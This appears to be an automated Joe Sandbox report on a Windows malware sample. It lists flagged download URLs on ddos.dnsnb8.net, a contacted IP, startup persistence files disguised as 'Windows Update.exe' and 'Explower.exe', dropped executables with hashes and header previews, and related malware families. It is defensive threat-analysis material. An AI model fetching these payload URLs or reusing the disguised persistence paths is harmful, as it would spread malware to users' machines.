http://www.scintilla.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar#O	RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar_	RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k4.rar$	RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rareM	RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar5	RRqyIX.exe, 00000001.00000002.2244767719.00000000006D6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.develop.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://pki-ocsp.symauth.com0	LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.dr	false	URL Reputation: safe	unknown
http://www.lua.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarPO	RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar1	RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.spaceblue.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarn	RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.baanboard.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarE	RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.develop.comDeepak	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.enigmaprotector.com/	Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A4B000.00000040.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarR	RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rard	RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarp6	RRqyIX.exe, 00000001.00000002.2244767719.000000000063E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k3.rarx	RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarc	RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarM	RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481747
Start date and time:	2024-07-25 13:54:57 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LisectAVT_2403002B_366.exe
Detection:	MAL
Classification:	mal100.spre.phis.troj.adwa.evad.winEXE@31/45@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 57% Number of executed functions: 200 Number of non-executed functions: 66
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: LisectAVT_2403002B_366.exe

Simulations

Behavior and APIs

Time	Type	Description
07:56:00	API Interceptor	1x Sleep call for process: WerFault.exe modified
07:56:27	API Interceptor	776739x Sleep call for process: server.exe modified
13:55:59	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe
13:56:07	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe
13:56:28	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	LisectAVT_2403002B_373.exe	Get hash	malicious	Bdaejec, Mars Stealer, Stealc, Vidar	Browse	ddos.dnsnb8.net:799/cj//k3.rar
	LisectAVT_2403002B_385.exe	Get hash	malicious	AgentTesla, Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_390.exe	Get hash	malicious	AgentTesla, Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_399.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	LisectAVT_2403002B_409.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_429.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_420.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	LisectAVT_2403002B_431.exe	Get hash	malicious	Bdaejec, BlackMoon	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	LisectAVT_2403002B_429.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	LisectAVT_2403002B_431.exe	Get hash	malicious	Bdaejec, BlackMoon	Browse	ddos.dnsnb8.net:799/cj//k1.rar

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	LisectAVT_2403002B_373.exe	Get hash	malicious	Bdaejec, Mars Stealer, Stealc, Vidar	Browse	44.221.84.105
	LisectAVT_2403002B_385.exe	Get hash	malicious	AgentTesla, Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_390.exe	Get hash	malicious	AgentTesla, Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_399.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_409.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_429.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_420.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_431.exe	Get hash	malicious	Bdaejec, BlackMoon	Browse	44.221.84.105
	LisectAVT_2403002B_429.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_431.exe	Get hash	malicious	Bdaejec, BlackMoon	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	LisectAVT_2403002B_373.exe	Get hash	malicious	Bdaejec, Mars Stealer, Stealc, Vidar	Browse	44.221.84.105
	LisectAVT_2403002B_385.exe	Get hash	malicious	AgentTesla, Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_390.exe	Get hash	malicious	AgentTesla, Bdaejec	Browse	44.221.84.105
	phish_alert_sp2_2.0.0.0(4).eml	Get hash	malicious	HTMLPhisher	Browse	52.6.56.188
	phish_alert_sp2_2.0.0.0 (27).eml	Get hash	malicious	HTMLPhisher	Browse	52.6.56.188
	LisectAVT_2403002B_399.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_409.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_429.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_420.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Ewhite Replay VM .docx	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	44.207.203.25

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590978502092559
Encrypted:	false
SSDEEP:	384:1FGSlXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:nbQGPL4vzZq2o9W7GsxBbPr
MD5:	2DBCBB4DB1ACA4CB9699647B07757570
SHA1:	5C142F719D31BEE681D12F16F51BB747B0FC9B1B
SHA-256:	22CA52A1AF4319AAAFC62BEF26154EED07A0C1E72E9AAFC3CAE6E9D352D9AB75
SHA-512:	CED86BC77B8C33FABB2E759EEEA2A97E6E081EF699F084CFE958927CC901A046B11C54C36FA55F69D811258A3D8E2C631EC46EAD68AC2D627AAFAA90D3CB027E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.7313459180456565
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	E10390D2566FCE69600EBD857B003B32
SHA1:	B6C2EC9A2F148D29A49831EF2F0F742D3C679553
SHA-256:	4EFEEAEC2A4468A0516EE2864C960EA58384A658E2FBB43CC6F76286BEC39A2E
SHA-512:	7F1A3FAA72239C40C740B0963C0BF53E8817593E1F5BFBEFD01D77E30315DD8D14E22A8D97A1234783717873CDD30F2B0008C1E9DCC6212559683D2FDB7AB1E3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Explower.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.366545618307718
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdsvQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdsoGCq2iW7z
MD5:	3E98111CACF3A776FA8C7A51514ADE84
SHA1:	E12663961AC403B533BDB645DEEEE637FE2E66C9
SHA-256:	A00E3CDDCB72C1360F854903B2F7434D3DFA16EFF1F9AD48BEFB981FF42FD63A
SHA-512:	B9188BC385CE5D7F61CF960121D0DAD7B429315DC8AFD91026221D96BCEC5577B3C20E70F7DC642BC2E80A3BAD207F5F839D65FFD5723E0C986E2F040A8675F7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RRqyIX.exe_152a71c642bbbcd7fd442643df33529b74505d85_06902e4b_5f2b330f-a3e7-41c9-bf73-f30df8d8d06a\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9889951404772511
Encrypted:	false
SSDEEP:	192:Qq7dbbni0bgK6njE/J9zuiFrZ24IO851:x7xbnpbgnnjQzuiFrY4IO851
MD5:	89925820EDBDCBE7EE9860B728DDA48C
SHA1:	0FAF6F3602CE42BB79D3733FC4CE23141677AD47
SHA-256:	78899D0999976B9580C784B2B607907C7EBE954520E9DC59C8417409E06A6B3A
SHA-512:	FAC967DF4AC4EC955B00332B7C0FB15071C57B868D5B11E092725E70366A1EEBF233D4B915D7E470CEED5E3D2BEC00D4CE37709DFA7EC97C6046F296109CEA57
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.8.2.1.5.6.5.6.3.4.3.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.8.2.1.5.7.5.7.9.0.6.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.2.b.3.3.0.f.-.a.3.e.7.-.4.1.c.9.-.b.f.7.3.-.f.3.0.d.f.8.d.8.d.0.6.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.2.2.f.b.c.8.-.4.5.d.9.-.4.7.6.4.-.8.6.e.d.-.c.c.2.c.f.2.7.e.9.0.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.R.q.y.I.X...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.1.8.-.0.0.0.1.-.0.0.1.5.-.d.2.4.e.-.2.7.9.8.8.9.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.a.5.c.f.0.e.6.4.a.b.7.4.0.f.9.1.2.8.8.6.0.4.a.9.4.3.4.5.6.9.c.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.R.R.q.y.I.X...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB57A.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jul 25 11:55:57 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	167194
Entropy (8bit):	1.8085127995570731
Encrypted:	false
SSDEEP:	768:YqV+x9wpeVg7yzR+nmU5VQLRKO/tOuzVF:Y8PEe+N+nZ5IN/tOuhF
MD5:	AB6F0C335403A6335FBA42C5C6FEACE0
SHA1:	026AE7D40CE9A9891446A15AABF89B2D1725F762
SHA-256:	0DB543CFCEDF68637BD9ABFB3E40D3BCC79C5F4E97A8C793C1564B0A4214732C
SHA-512:	73D31AD11E97684568332C24F106A4EF97D0CF63B68368F60A980487FC4C71EC9F4A34718FA7742A82BDF0C44C192DC63C78631D8EF9820FA9196E6CFD453396
Malicious:	false
Preview:	MDMP..a..... .......M=.f............t.......................<...,!......d....Q..........`.......8...........T............>...N..........h!..........T#..............................................................................eJ.......#......GenuineIntel............T...........F=.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB82A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6268
Entropy (8bit):	3.724953000150766
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbyhg6GZYW2d459aE5aMQUB89bUlsfVjcm:R6l7wVeJcg6oYWXDbpDB89bUlsfVjcm
MD5:	D3F2D1B2AE41FD2DEC99F7284E576CE0
SHA1:	9293C67CD1772831E5E81FD0B38ABABEA4FB35C2
SHA-256:	788F61B0CBFDC159A4264288204FA29E89710B1AAD1D59D6F75D9A7DE3467E74
SHA-512:	611A58099A4CD27319F41FB901F551F57644CA86F3DF51FF473D389B82A5C66C6D5558E0B2E704534BB3FDCE1C9521FF10439EA283C7894B0BE613B6DB2740D0
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.8.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB85A.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.46050339256656
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI963VWpW8VYyYm8M4J0gFXp+q8eFTiYhgkTd:uIjfNI7Y3k7V2JXptTjhgkTd
MD5:	3AB9F5902AB34582E9591C4ABCABDCCD
SHA1:	830AC77062CD0B7CD73531FC8F8868022FDA25FA
SHA-256:	DECD3AB44DC7A6C9317663E751886EA1C17BAA1B281D637E47C5D8ED58832199
SHA-512:	03FD8660A3CB6C0BD52AF878A76898F059AA8CF9CF1240A0D0EB2A88258152D6F160CB39ECC919391D18CD25920F4A03018F7060B5433E102C18DAEE54A6A402
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426418" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Explower.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1214464
Entropy (8bit):	7.958532392669138
Encrypted:	false
SSDEEP:	24576:E7JjITr1aZUsd/MedVJndc9B0S+fenBvK8k:g81aZTdvffenk8
MD5:	16AB569E9D84F0A2C9AACD47D4998D84
SHA1:	DF051511743F94A52BDBC270C4E5BF0D303D6975
SHA-256:	7FB6D8E7D8BD58F1445F0C105D609BD3DB7445D55D9ABEFC18E5E78C06B7A96F
SHA-512:	614447286EB0C439DD5EB183E6175F33EAF567475BFEFB52CFF2B543ACE319963D099C6AD3190A31AF782395C5CC9B3DF34BFC9F8EC7EF0D387106454EFE288D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.e..............................9.. ........@.. ........................:.. ........@... .. .... .. .................. .+...............................+.................................................................................................. ....... ..............@............ ..........................@............ ).........................@....data..............................@.....d.u...`....9..B...F.............. .....fl...:.v.2.........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.259753436570609
Encrypted:	false
SSDEEP:	12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
MD5:	260E01CC001F9C4643CA7A62F395D747
SHA1:	492AD0ACE3A9C8736909866EEA168962D418BE5A
SHA-256:	4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
SHA-512:	01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
Malicious:	false
